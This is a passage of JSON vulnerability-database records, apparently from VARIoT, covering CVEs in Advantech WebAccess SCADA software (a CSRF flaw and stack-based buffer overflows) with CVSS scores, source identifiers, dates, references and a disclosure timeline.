"4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "db": "CNNVD", "id": "CNNVD-201202-422" }, { "db": "NVD", "id": "CVE-2012-1235" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001564" } ] }, "cve": "CVE-2012-1235", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.8, "id": "CVE-2012-1235", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CNVD-2012-9017", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "1a0e738c-2354-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "7d789810-463f-11e9-88a7-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 6.8, "id": "VHN-54516", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-1235", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-1235", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2012-9017", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201202-422", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-54516", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "VULHUB", "id": "VHN-54516" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "db": "CNNVD", "id": "CNNVD-201202-422" }, { "db": "NVD", "id": "CVE-2012-1235" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0235. Advantech/BroadWin WebAccess Contains a cross-site request forgery vulnerability. BroadWin SCADA WebAccess is a web browser-based HMI and SCADA software for industrial control systems and automation", "sources": [ { "db": "NVD", "id": "CVE-2012-1235" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-54516" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-1235", "trust": 3.7 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201202-422", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2012-9017", "trust": 1.2 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001564", "trust": 0.8 }, { "db": "IVD", "id": "1A0E738C-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "7D789810-463F-11E9-88A7-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "4AD6FB9A-1F73-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-54516", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "VULHUB", "id": "VHN-54516" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "db": "CNNVD", "id": "CNNVD-201202-422" }, { "db": "NVD", "id": "CVE-2012-1235" } ] }, "id": "VAR-201202-0343", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "VULHUB", "id": "VHN-54516" } ], "trust": 2.01735348 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9017" } ] }, "last_update_date": "2024-11-23T21:46:31.648000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech/BroadWin WebAccess cross-site request forgery vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/34072" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54516" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "db": "NVD", "id": "CVE-2012-1235" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1235" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1235" }, { "trust": 0.6, "url": "http://web.nvd.nist.gov/view/vuln/search-results?query=cve-2012-1235" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "VULHUB", "id": "VHN-54516" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "db": "CNNVD", "id": "CNNVD-201202-422" }, { "db": "NVD", "id": "CVE-2012-1235" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "VULHUB", "id": "VHN-54516" }, { "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "db": "CNNVD", "id": "CNNVD-201202-422" }, { "db": "NVD", "id": "CVE-2012-1235" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-22T00:00:00", "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-22T00:00:00", "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "date": "2012-02-22T00:00:00", "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "date": "2012-02-22T00:00:00", "db": "CNVD", "id": "CNVD-2012-9017" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-54516" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-422" }, { "date": "2012-02-21T13:31:57.330000", "db": "NVD", "id": "CVE-2012-1235" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-22T00:00:00", "db": "CNVD", "id": "CNVD-2012-9017" }, { "date": "2012-02-23T00:00:00", "db": "VULHUB", "id": "VHN-54516" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001564" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-422" }, { "date": "2024-11-21T01:36:42.960000", "db": "NVD", "id": "CVE-2012-1235" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-422" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess Cross-Site Request Forgery Vulnerability", "sources": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-9017" }, { "db": "CNNVD", "id": "CNNVD-201202-422" } ], "trust": 1.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Cross Site Request Forgery", "sources": [ { "db": "IVD", "id": "1a0e738c-2354-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d789810-463f-11e9-88a7-000c29342cb1" }, { "db": "IVD", "id": "4ad6fb9a-1f73-11e6-abef-000c29c66e3d" } ], "trust": 0.6 } }
var-201708-1723
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-537", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-537", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4070", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-537", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ] }, "id": "VAR-201708-1723", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:41:05.815000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-537", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-537", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-537", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Contrast Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-537" } ], "trust": 0.7 } }
var-202005-0334
Vulnerability from variot
Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple stack-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution. Advantech WebAccess Node Is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess/SCADA. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x00005241 in DATACORE.exe. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required. The vulnerability is due to the fact that the program does not correctly verify the length of the data submitted by the user
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess/scada", "scope": null, "trust": 6.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.9, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "gte", "trust": 0.6, "vendor": "advantech", "version": "8.4.4" }, { "_id": null, "model": "webaccess node", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "9.0.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "9.0.0" } ], "sources": [ { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e" }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f" }, { "db": "ZDI", "id": "ZDI-20-625" }, { "db": "ZDI", "id": "ZDI-20-591" }, { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-624" }, { "db": "ZDI", "id": "ZDI-20-590" }, { "db": "ZDI", "id": "ZDI-20-592" }, { "db": "ZDI", "id": "ZDI-20-622" }, { "db": "ZDI", "id": "ZDI-20-619" }, { "db": "ZDI", "id": "ZDI-20-633" }, { "db": "CNVD", "id": "CNVD-2020-29740" }, { "db": "VULMON", "id": "CVE-2020-12002" }, { "db": "JVNDB", "id": "JVNDB-2020-005161" }, { "db": "NVD", "id": "CVE-2020-12002" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2020-005161" } ] }, "credits": { "_id": null, "data": "Z0mb1E", "sources": [ { "db": "ZDI", "id": "ZDI-20-625" }, { "db": "ZDI", "id": "ZDI-20-591" }, { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-624" }, { "db": "ZDI", "id": "ZDI-20-590" }, { "db": "ZDI", "id": "ZDI-20-592" }, { "db": "ZDI", "id": "ZDI-20-622" }, { "db": "ZDI", "id": "ZDI-20-619" }, { "db": "ZDI", "id": "ZDI-20-633" } ], "trust": 6.3 }, "cve": "CVE-2020-12002", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2020-12002", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.1, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "JVNDB-2020-005161", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2020-29740", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "fafb27eb-2f95-48b4-b412-633e1702e89e", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-164637", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12002", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 4.9, "userInteraction": "NONE", "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "id": "CVE-2020-12002", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2020-12002", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2020-005161", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2020-12002", "trust": 4.9, "value": "CRITICAL" }, { "author": "ZDI", "id": "CVE-2020-12002", "trust": 1.4, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2020-12002", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2020-005161", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2020-29740", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202005-298", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-164637", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2020-12002", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "fafb27eb-2f95-48b4-b412-633e1702e89e" }, { "db": "IVD", "id": "d30ffcd7-838b-4bfa-b622-12761ec4a16f" }, { "db": "ZDI", "id": "ZDI-20-625" }, { "db": "ZDI", "id": "ZDI-20-591" }, { "db": "ZDI", "id": "ZDI-20-634" }, { "db": "ZDI", "id": "ZDI-20-624" }, { "db": "ZDI", "id": "ZDI-20-590" }, { "db": "ZDI", "id": "ZDI-20-592" }, { "db": "ZDI", "id": "ZDI-20-622" }, { "db": "ZDI", "id": "ZDI-20-619" }, { "db": "ZDI", "id": "ZDI-20-633" }, { "db": "CNVD", "id": "CNVD-2020-29740" }, { "db": "VULHUB", "id": "VHN-164637" }, { "db": "VULMON", "id": "CVE-2020-12002" }, { "db": "JVNDB", "id": "JVNDB-2020-005161" }, { "db": "CNNVD", "id": "CNNVD-202005-298" 